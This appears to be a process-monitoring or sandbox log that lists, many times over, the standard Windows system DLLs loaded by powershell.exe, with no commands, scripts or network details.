Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
